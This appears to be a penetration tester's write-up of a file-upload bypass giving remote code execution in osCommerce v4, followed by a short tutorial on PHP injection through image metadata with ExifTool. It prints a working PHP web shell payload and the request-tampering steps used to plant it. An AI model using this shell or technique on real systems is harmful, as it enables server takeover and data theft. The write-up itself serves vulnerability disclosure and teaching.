In my recent penetration test, I identified a critical vulnerability in osCommerce v4, specifically a Remote Code Execution (RCE) vulnerability enabled by bypassing file upload restrictions.
This issue was discovered while editing the administrator’s profile picture. By changing the file extension from ‘shekk.gif’ to ‘shell.php’, as detailed in the request below, the application erroneously accepted the file with the altered extension.
I initiated the upload process of a malicious GIF file. This was done by clicking on ‘edit’ to upload the file.
The request was intercepted using Burp Suite, as illustrated in the image below. During this process, I altered the file extension from ‘shell.gif’ to ‘shell.php’. The content of this file included the following payload:
GIF89a;
<?
system($_GET[‘cmd’]);
?>
The payload above is a simple yet effective PHP script designed to execute system commands from the GET request’s ‘cmd’ parameter. The initial ‘GIF89a;’ is a GIF file header, which tricks the server into treating this file as a benign image. This method is a classic example of bypassing upload filters by exploiting the server’s file handling logic, allowing for the execution of arbitrary commands.
After the upload, I noticed that the image appeared to be loaded, but the file extension remained as ‘shell.gif’.
However, upon clicking ‘Update’ and re-examining the request, I found the ‘avatar’ parameter containing the file ‘shell.gif’. By modifying this to ‘shell.php’, the upload was successfully executed, and the file was accepted by the application.
By accessing the ‘shell.php’ file in its directory, I was able to successfully achieve Remote Code Execution (RCE). As an example, executing the command ‘cat /etc/passwd’ demonstrated the ability to run server commands and potentially access sensitive data.”
I’m going to share a neat trick on how to achieve Remote Code Execution (RCE) via metadata using the ExifTool. It’s a nifty little method that can yield some powerful results.
So, imagine you have an image file and you want to embed some PHP code into its metadata using ExifTool. Let’s say you insert the following code into the comment field: <?php echo system(‘id’);?>.
This code, when executed, will display the output of the id command, which gives information about the current user and their privileges.
Once you’ve inserted this PHP code into the metadata of your image file. Now, here’s where things get interesting. If the application doesn’t properly sanitize or filter the metadata of uploaded files, it might execute the PHP code embedded in the image’s metadata.
Now, let’s say we intercept the request using a tool like Burp Suite. We can then examine the response and see if our PHP code was executed successfully. If it was, we’ll be able to observe the output of the id command right there in the response, confirming that we've achieved Remote Code Execution.
So, there you have it — a sneaky little trick to achieve RCE via metadata using ExifTool. Happy hacking!
